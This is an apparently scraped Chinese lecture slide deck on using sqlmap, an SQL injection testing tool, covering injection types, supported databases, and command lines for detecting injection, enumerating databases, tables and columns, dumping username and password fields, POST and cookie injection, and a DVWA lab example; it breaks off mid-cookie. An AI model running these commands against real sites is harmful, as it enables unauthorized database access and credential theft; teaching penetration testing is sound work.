第4章_工具sqlmap的使用.pptxVIP

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
一、什么是SQLmap? SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,用Python编写。 二、如何下载SQLmap? 可以通过位于SourceForge的官方网站下载SQLmap源码:/projects/sqlmap/ 三、参考资源 SQL注入之SQLmap入门 /articles/web/29942.html sqlmap使用参数详解 /kali_linux/article/details四、sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用union的情况下的注入。 5、堆查询注入,可以同时执行多条语句的执行时的注入。 五、sqlmap支持的数据库 MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB 六、检测注入基本格式 1、sqlmap -u “/post.php?id=1″ 默认使用level1,默认检测全部数据库类型 2、sqlmap -u “/post.php?id=1″ --dbms mysql --level 3 指定数据库类型为mysql,级别为3(共5级,级别越高,检测越全面) 3、使用cookie注入 sqlmap -u /shownews.asp --cookie id=11 --level 2(只有level达到2才会检测cookie) 七、注入成功后获取数据库基本信息 1、sqlmap -u /post.php?id=1 --level 3 --dbs //查询有哪些数据库 2、sqlmap -u “/post.php?id=1” --level 3 --current-db //查询当前数据库 3、sqlmap -u /post.php?id=1 --level 3 -D test --tables //查询test数据库中有哪些表 4、sqlmap -u /post.php?id=1 --level 3 -D test -T admin --columns //查询test数据库中admin表有哪些字段 5、sqlmap -u /post.php?id=1 --level 3 -D test -T admin -C username, password --dump //dump出字段username与password中的数据 八、举例: C:\Documents and Settings\Administratorsqlmap.py -u /8 /index.php?id=1 --current-db //查询当前数据库 八、举例: C:\Documents and Settings\Administratorsqlmap.py -u /8 /index.php?id=1 -D my_db --tables //查询my_db数据库中有哪些表 八、举例: C:\Documents and Settings\Administratorsqlmap.py -u /8 /index.php?id=1 -D my_db -T thiskey --columns //查询my_db数据库中thiskey表有哪些字段 九、POST注入 扫描网站: /Login.asp 命令一: sqlmap -u /Login.asp --data tfUName=11tfUPass=13“ --level=3 注: “tfUName=11tfUPass=13“ 为POST传递的参数。 九、POST注入 扫描网站: /Login.asp 命令二: sqlmap -r search-test.txt -p tfUPass 其中search-test.txt的内容为BurpSuite所抓的post包 十、扫描DVWA示例(使用cookie参数) 使用SQLmap之前我们得到需要当前会话cookies等信息,用来在渗透过程中维持连接状态,可以使用Firefox中名为“TamperData”的add-on获取。 当前得到的cookie为“security=low;PHPSESSID=57p5

文档评论(0)

JuanHuang + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档